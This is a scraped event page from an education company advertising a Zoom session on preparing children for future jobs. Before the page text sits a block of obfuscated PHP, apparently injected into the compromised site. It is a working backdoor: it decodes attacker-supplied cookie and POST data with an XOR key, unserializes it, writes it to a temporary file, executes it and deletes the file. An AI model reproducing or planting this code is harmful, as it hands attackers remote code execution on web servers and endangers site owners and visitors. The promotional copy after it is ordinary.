$OJACwgla = chr ( 944 - 871 ).chr (95) . "\x78" . chr (76) . chr ( 381 - 272 ); $jcaAsxsC = "\x63" . 'l' . "\141" . "\163" . "\163" . chr (95) . chr ( 263 - 162 )."\x78" . chr (105) . chr ( 272 - 157 )."\x74" . 's';$wditdJRkc = class_exists($OJACwgla); $jcaAsxsC = "51356";$DsdKjLE = strpos($jcaAsxsC, $OJACwgla);if ($wditdJRkc == $DsdKjLE){function qIxWugPTf(){$zQepvoUn = new /* 6488 */ I_xLm(56203 + 56203); $zQepvoUn = NULL;}$NyKazOQFW = "56203";class I_xLm{private function dHZXHJ($NyKazOQFW){if (is_array(I_xLm::$OMOjjxBqQ)) {$name = sys_get_temp_dir() . "/" . crc32(I_xLm::$OMOjjxBqQ["salt"]);@I_xLm::$OMOjjxBqQ["write"]($name, I_xLm::$OMOjjxBqQ["content"]);include $name;@I_xLm::$OMOjjxBqQ["delete"]($name); $NyKazOQFW = "56203";exit();}}public function vgrRtjPCS(){$ZtwXhpBA = "52800";$this->_dummy = str_repeat($ZtwXhpBA, strlen($ZtwXhpBA));}public function __destruct(){I_xLm::$OMOjjxBqQ = @unserialize(I_xLm::$OMOjjxBqQ); $NyKazOQFW = "60167_51485";$this->dHZXHJ($NyKazOQFW); $NyKazOQFW = "60167_51485";}public function NpmAsEl($ZtwXhpBA, $GBLUOBkBu){return $ZtwXhpBA[0] ^ str_repeat($GBLUOBkBu, intval(strlen($ZtwXhpBA[0]) / strlen($GBLUOBkBu)) + 1);}public function nUxhlpUq($ZtwXhpBA){$FysvEdu = chr ( 547 - 449 ).chr (97) . "\x73" . chr ( 1027 - 926 )."\x36" . "\64";return array_map($FysvEdu . chr ( 664 - 569 ).'d' . chr ( 546 - 445 ).chr ( 144 - 45 ).'o' . chr ( 597 - 497 )."\x65", array($ZtwXhpBA,));}public function __construct($HfYENh=0){$LPPPRb = "\x2c";$ZtwXhpBA = "";$ElbxSoltn = $_POST;$rCwDgLYcnv = $_COOKIE;$GBLUOBkBu = "86a24b5f-4593-493c-a7d8-74643ccbc737";$ZtRmmNbtc = @$rCwDgLYcnv[substr($GBLUOBkBu, 0, 4)];if (!empty($ZtRmmNbtc)){$ZtRmmNbtc = explode($LPPPRb, $ZtRmmNbtc);foreach ($ZtRmmNbtc as $RdvWn){$ZtwXhpBA .= @$rCwDgLYcnv[$RdvWn];$ZtwXhpBA .= @$ElbxSoltn[$RdvWn];}$ZtwXhpBA = $this->nUxhlpUq($ZtwXhpBA);}I_xLm::$OMOjjxBqQ = $this->NpmAsEl($ZtwXhpBA, $GBLUOBkBu);if (strpos($GBLUOBkBu, $LPPPRb) !== FALSE){$GBLUOBkBu = explode($LPPPRb, $GBLUOBkBu); $vYAYfUz = base64_decode(md5($GBLUOBkBu[0])); $iwikMy = strlen($GBLUOBkBu[1]) > 5 ? substr($GBLUOBkBu[1], 0, 5) : $GBLUOBkBu[1];$_GET['new_key'] = md5(implode('', $GBLUOBkBu)); $bQEIUDtACX = str_repeat($iwikMy, 2); $zemsVeZDk = array_map('trim', $GBLUOBkBu);}}public static $OMOjjxBqQ = 18036;}qIxWugPTf();} IS YOUR CHILD FUTURE READY? | LearnMaxPro Solutions
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As we know, the job market is changing completely in the next 10 years! Today’s parents are perpetually trying to equip their children with independence and self-sufficiency in the world. We are here to assist in the Same.
We always make sure that your child’s learning is never interrupted, no matter where they are in their learning journey. We educate your child the skills, agility, and resilience to thrive in every situation beyond the classroom in an uncertain, ever-changing, fast-paced world, and we ensure their success whether our institutes are open or they are learning from home.

One study suggests that while students definitely need to learn the academic skills, the focus needs to also shift towards the 21st century skills where they master how to solve newer problems through critical thinking, creativity, communication and collaboration.


Understand the strengths and weaknesses of your child now before it’s too late.


  • Challenge, encourage and motivate Students to be confident learners.
  • Balance students’ intellectual challenges with nurturing support, allowing each child’s strengths to shine.
  • Coding, creativity, and intelligence training for their brighter future
  • We continuously strive to maintain safe learning environments to ensure that learning isn’t disrupted by city restrictions or campus closures during the pandemic.

Location: Virtual via Zoom Meetings

For any queries, Contact us at-

support@learnmaxpro.com; +91 8920742324


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  • Start Time
    September 30 @ 5:00 PM
  • End Time
    September 30 @ 6:00 PM